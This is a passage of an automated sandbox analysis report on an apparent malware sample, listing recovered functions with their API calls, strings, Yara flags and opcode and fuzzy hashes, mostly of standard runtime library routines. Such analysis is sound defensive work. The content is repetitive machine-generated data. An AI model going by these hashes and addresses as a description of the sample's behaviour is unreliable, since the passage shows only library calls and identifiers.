Instruction ID: 24969db738fe4d1a967b5a52fd3328d3273a2fbbb48021401f3901a8ee12547a
Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
Instruction Fuzzy Hash: 7FF0A03460010AFBCF00EFA5DE46EEF37687B00745F600616B610E20E1EB79DA549768

Function 02485A67 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

std::_Cnd_initX.LIBCPMT ref: 02485A83
__Cnd_signal.LIBCPMT ref: 02485A8F
std::_Cnd_initX.LIBCPMT ref: 02485AA4
__Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 02485AAB

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
String ID:
API String ID: 2059591211-0
Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
Instruction ID: 7562e23720ca14c0881c1d58a19b0123a80bd25dcea8da757555e7901b0e7e6e
Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
Instruction Fuzzy Hash: B2F0E531520700EFEF227B73D80571E77A2AF01328F54482FE15A969A0CFBAE8558E55

Function 02492858 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RegisterWaitForSingleObject.KERNEL32(?,00000000,00423592,000000A4,000000FF,0000000C), ref: 0249286F
GetLastError.KERNEL32(?,?,?,?,02498830,?,?,?,?,00000000,?,00000000), ref: 0249287E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02492894
__CxxThrowException@8.LIBVCRUNTIME ref: 024928A2

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
String ID:
API String ID: 3803302727-0
Opcode ID: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
Instruction ID: aec0aaa7c62f9fe8312bde4c062f1fbaf414c32f16c8700e1188f910ade556e2
Opcode Fuzzy Hash: 2ae2fd32a1d2a838208ab3d1a8fced2e3adc472ac1278b377655e8aa8aae26b1
Instruction Fuzzy Hash: 0FF0A03490010ABBCF00EFA5CD44EAF3BBCAB00B01F200616B910E20A0DB74D6049B64

Function 00412316 Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtCreateEventExW.LIBCPMT ref: 0041232C
GetLastError.KERNEL32(?,?,?,?,?,00410B39), ref: 0041233A
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412350
__CxxThrowException@8.LIBVCRUNTIME ref: 0041235E

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
String ID:
API String ID: 200240550-0
Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction ID: 785b6ff49928477fe7b23022ebabbc79c69e7cefd8d4159d1ac4e3541b52c9d2
Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction Fuzzy Hash: 01E0D871A0021929E710B7768E03FBF369C6B00B49F54096ABE14E51D3FDACD65042AC

Function 0249257D Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtCreateEventExW.LIBCPMT ref: 02492593
GetLastError.KERNEL32(?,?,?,?,?,02490DA0), ref: 024925A1
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024925B7
__CxxThrowException@8.LIBVCRUNTIME ref: 024925C5

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
String ID:
API String ID: 200240550-0
Opcode ID: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction ID: c27784b29f73ed2c89e834a075d5c1cdddc6492e16024abb30fdb0025740cf24
Opcode Fuzzy Hash: b13ab56965c0887775dfe6ae7b5ceab245a5f6078597de59d26007bfcb9aef54
Instruction Fuzzy Hash: DFE0D871A0021639EB10F7B64C12F7F3A9C9B10B41F44085BBD14E51C1FED4D10049A4

Function 004192C9 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004126F2: TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8

TlsAlloc.KERNEL32(?,00410B39), ref: 0042397F
GetLastError.KERNEL32 ref: 00423991
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004239A7
__CxxThrowException@8.LIBVCRUNTIME ref: 004239B5

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3735082963-0
Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction ID: d941d7adcdfcb95fe7f1ae92eeb0e95f25cd9e5dbb2d3936931fab3d4402dca1
Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction Fuzzy Hash: FEE02BB09002206EC300BF766C4A66E3274750130AB500B2BB151D21D2EEBCD1844A9D

Function 02499530 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02492959: TlsAlloc.KERNEL32(?,02490DA0), ref: 0249295F

TlsAlloc.KERNEL32(?,02490DA0), ref: 024A3BE6
GetLastError.KERNEL32 ref: 024A3BF8
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024A3C0E
__CxxThrowException@8.LIBVCRUNTIME ref: 024A3C1C

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3735082963-0
Opcode ID: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction ID: 1ba54625472139bf85578ddc668998a8cdbcdc7dec36a2a7e15fa6a4bcc1ea00
Opcode Fuzzy Hash: 66048b5912d9800ecb047d2b21c4276ce59f10e340e5510923950ad1c38f33ca
Instruction Fuzzy Hash: CDE02274500202AFCB00BF769CA9A7A7E69AA107017100A6BE925D21A1FA34D0068E68

Function 0041252D Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B39), ref: 00412537
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B39), ref: 00412546
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041255C
__CxxThrowException@8.LIBVCRUNTIME ref: 0041256A

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
String ID:
API String ID: 3016159387-0
Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction ID: 7399f334bae95f1f5dd7aa6ec606231f62b338b040d4ba0de61eab0e9ab47a66
Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction Fuzzy Hash: A1E0D87060010AABC700EBB5DE4AAEF73BC7A00605B600166A101E2151EA6CDA44877C

Function 02492794 Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,02490DA0), ref: 0249279E
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,02490DA0), ref: 024927AD
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024927C3
__CxxThrowException@8.LIBVCRUNTIME ref: 024927D1

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
String ID:
API String ID: 3016159387-0
Opcode ID: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction ID: 10975cf8d30a9dc56dda0ca23f26f8eaecd1c76986fdd7eab6668915f680aa8b
Opcode Fuzzy Hash: aa1fe1726c391e6c90679c86a0ef38e15e3ee04fdf49ded71e00b6b13b472e10
Instruction Fuzzy Hash: E4E08074900109B7CF00FBB5DD45EAF77BC6A00B05B600566A501F3150EB65D7048B75

Function 00412685 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

SetThreadPriority.KERNEL32(?,?), ref: 00412691
GetLastError.KERNEL32 ref: 0041269D
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126B3
__CxxThrowException@8.LIBVCRUNTIME ref: 004126C1

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
String ID:
API String ID: 4286982218-0
Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction ID: eb1a6d40bee4d863ba02ef3eb8c9f1a5d1f26ddbf15ae4e912fb13e181a4c061
Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction Fuzzy Hash: 3CE04F34600119ABCB14BF619E06BAF376C7A00745B50052AB515D10A2EE79D564869C

Function 0041274B Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE

Download Yara Rule

APIs

TlsSetValue.KERNEL32(?,00000000,00417971,00000000,?,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412757
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412763
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412779
__CxxThrowException@8.LIBVCRUNTIME ref: 00412787

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
String ID:
API String ID: 1964976909-0
Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction ID: 63a90eab5ccd82633b541feab557f5b3d99097aee930e3f4eaa44923ec20be65
Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction Fuzzy Hash: 43E04F34600119AADB10BF619E0AAAF37A87A00A45B50052AB915D10A2EE79D564869C

Function 024928EC Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

SetThreadPriority.KERNEL32(?,?), ref: 024928F8
GetLastError.KERNEL32 ref: 02492904
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0249291A
__CxxThrowException@8.LIBVCRUNTIME ref: 02492928

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
String ID:
API String ID: 4286982218-0
Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction ID: 97b46cdfd56066b73664fa90e266908f4a3d7342817f65d22067273f228c63ed
Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction Fuzzy Hash: D7E086346001097BCF14FF72CC45FBB3B6CBB00B45B50092ABC15D20A1EF75D1048A98

Function 024929B2 Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE

Download Yara Rule

APIs

TlsSetValue.KERNEL32(?,00000000,02497BD8,00000000,?,?,02490DA0,?,?,?,00000000,?,00000000), ref: 024929BE
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 024929CA
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024929E0
__CxxThrowException@8.LIBVCRUNTIME ref: 024929EE

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
String ID:
API String ID: 1964976909-0
Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction ID: c633e706738ef8ec576eb7664d22cfd30d45f5d3827684387e1aae06fce61679
Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction Fuzzy Hash: A0E04F746001097ADF10FF618C48BBB3A6CAB00B45B50092AB919D10A0EB75D1149AA8

Function 004126F2 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
GetLastError.KERNEL32 ref: 00412705
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041271B
__CxxThrowException@8.LIBVCRUNTIME ref: 00412729

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3103352999-0
Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction ID: 71e6de1c8af28f534afd96217d060265c7bf952bbd0c624222ea3419adf54434
Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction Fuzzy Hash: 2AE0CD34500115578714BB755D0AABF72587901719B600B1AF131D20D1FB6CD458429C

Function 02492959 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,02490DA0), ref: 0249295F
GetLastError.KERNEL32 ref: 0249296C
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02492982
__CxxThrowException@8.LIBVCRUNTIME ref: 02492990

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3103352999-0
Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction ID: 39b89da5196754ac7e66ba7afbf2fb2fdc32eb80da0eee6845f7c8a3fde144f0
Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction Fuzzy Hash: 62E0C2305001057B8B14FBB99C48A7B36AC6A01B15B600B2BF861E20E0EBA8D1084AA8

Function 0042F07D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0042F10D

Strings

pow, xrefs: 0042F0E5, 0042F102

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
Instruction ID: 9c0c3c151ae2a5a6b50f0fee57114a4457493f87fddc68121f24b850b116d2d7
Opcode Fuzzy Hash: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
Instruction Fuzzy Hash: 8C515D61B04302D6DB117714E90137BABA0EB54B40FE4597FF491813E9EE3D8CAA9A4F

Function 0043AE69 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0C4,?,00000050,?,?,?,?,?), ref: 0043AF44

Strings

OCP, xrefs: 0043AEBD
ACP, xrefs: 0043AE87

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction ID: 14488b359d73a2b35151aaad325e7c1d9f20b01c06d3923b8e2598dc1437a59e
Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction Fuzzy Hash: F3212BA2AC4101A6DB30CB54C907B977366EF5CB11F569526E98AC7300F73ADD11C39E

Function 024BB0D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,024BB32B,?,00000050,?,?,?,?,?), ref: 024BB1AB

Strings

ACP, xrefs: 024BB0EE
OCP, xrefs: 024BB124

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction ID: d82f5f31afa3fae170ceda9a83c7987e31ea26b755ebb3535ab00374713e52e8
Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction Fuzzy Hash: DB217F62A10105A6EB378F658D01BE772AAEF44BDDF4A8526ED09D7304E732D941C7B0

Function 00401F0A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F25
GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F4A

Strings

image/png, xrefs: 00401F58

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: EncodersGdipImage$Size
String ID: image/png
API String ID: 864223233-2966254431
Opcode ID: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
Instruction ID: a861e299a60b9ced5094bb1731eec5177a5b987cbaa8a1425c649574426e8627
Opcode Fuzzy Hash: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
Instruction Fuzzy Hash: 04119476D00109FFCB01AFA99C8149EBB76FE41321B60027BE810B21E0C7755F419A58

Function 0040EF26 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000000D,?,0040DE41,0040C659,?,?,00000000,?,0040C529,0045D5E4,0040C4F6,0045D5DC,?,ios_base::failbit set,0040C659), ref: 0040EFAA

Strings

F(@, xrefs: 0040EF29

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: ErrorLast
String ID: F(@
API String ID: 1452528299-2698495834
Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
Instruction ID: 02fe8a739a07683bc60ca74788e4bb9a0325118a5e4d2b20450d6bc28493fa7e
Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
Instruction Fuzzy Hash: 2B11C236300216BFCF165F66DD4496AB765BB08B11B11483AFA05A6290CA7498219BD9

Function 0040C510 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 0040C554

Strings

F(@, xrefs: 0040C547
ios_base::failbit set, xrefs: 0040C510

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: ___std_exception_destroy
String ID: F(@$ios_base::failbit set
API String ID: 4194217158-1828034088
Opcode ID: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
Instruction ID: 4ba2cac2fce41df0eb0aef52a6a00c17a8a4a8275336f9ee0f9be7dda5d805c6
Opcode Fuzzy Hash: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
Instruction Fuzzy Hash: 27F0B472A0022836D2302B56BC02B97F7CC8F50B69F14443FFE05A6681EBF8A94581EC

Function 0044068A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00440691

Strings

RCC, xrefs: 004406C3
MOC, xrefs: 004406B4

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: H_prolog3_catch
String ID: MOC$RCC
API String ID: 3886170330-2084237596
Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
Instruction ID: e9e4e095770ca636dcca3efe7f5224ff47edcbfbbe98bab9d98b6a8866433d4c
Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
Instruction Fuzzy Hash: 81F0AF70600224CFDB22AF95D40159D3B60AF82748F8281A7F9009B262C73C6E14CFAE

Function 00404E07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo.LIBCPMT ref: 00404E3C

Part of subcall function 0040BF5D: std::_Lockit::_Lockit.LIBCPMT ref: 0040BF71
Part of subcall function 0040BF5D: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040BFAE

std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404E50

Part of subcall function 0040C008: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040C02F
Part of subcall function 0040C008: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C0A0

Strings

F@, xrefs: 00404E48

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: std::_$Locinfo::_$LocinfoLockit$Locinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: F@
API String ID: 2118720939-885931407
Opcode ID: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
Instruction ID: 13870e84e441ff14f0459789a428ac9660f365acd1e629d5c6e8dadf1a096d8e
Opcode Fuzzy Hash: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
Instruction Fuzzy Hash: 7CF034B2410205DAEB21AF50C412B9973B4BF80B15F61813FE545AB2C1DB786949CB89

Function 00428D77 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 00428D83
__CxxThrowException@8.LIBVCRUNTIME ref: 00428DAA

Part of subcall function 0042860D: RaiseException.KERNEL32(?,?,0040D87E,00000000,00000000,00000000,00000000,?,?,?,?,0040D87E,00000000,0045617C,00000000), ref: 0042866D

Strings

Access violation - no RTTI data!, xrefs: 00428D7A

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
String ID: Access violation - no RTTI data!
API String ID: 2053020834-2158758863
Opcode ID: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
Instruction ID: 6523df8e39b2e501409064d37ec9e65ca05e1b8799177bf407a1bfc54a05c872
Opcode Fuzzy Hash: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
Instruction Fuzzy Hash: 28E0DF726993185A9A04D6A1B846CDE73EC9E24300BA0001FF900920C2EE2DF918826D

Function 0042381B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON

Download Yara Rule

APIs

Concurrency::details::InternalContextBase::~InternalContextBase.LIBCONCRT ref: 0042382E

Strings

zB, xrefs: 00423821
~B, xrefs: 00423827

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: ContextInternal$BaseBase::~Concurrency::details::
String ID: zB$~B
API String ID: 3275300208-395995950
Opcode ID: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
Instruction ID: f55228a66ce0378ecda15d2e29e2cf9b619ecd1f8f2314d3bfe00ef4b4db5243
Opcode Fuzzy Hash: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
Instruction Fuzzy Hash: 83D05B7124C32525E2256A4974057857AD84B01764F50803FF94456682CBB9654442DC

Function 004212BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON

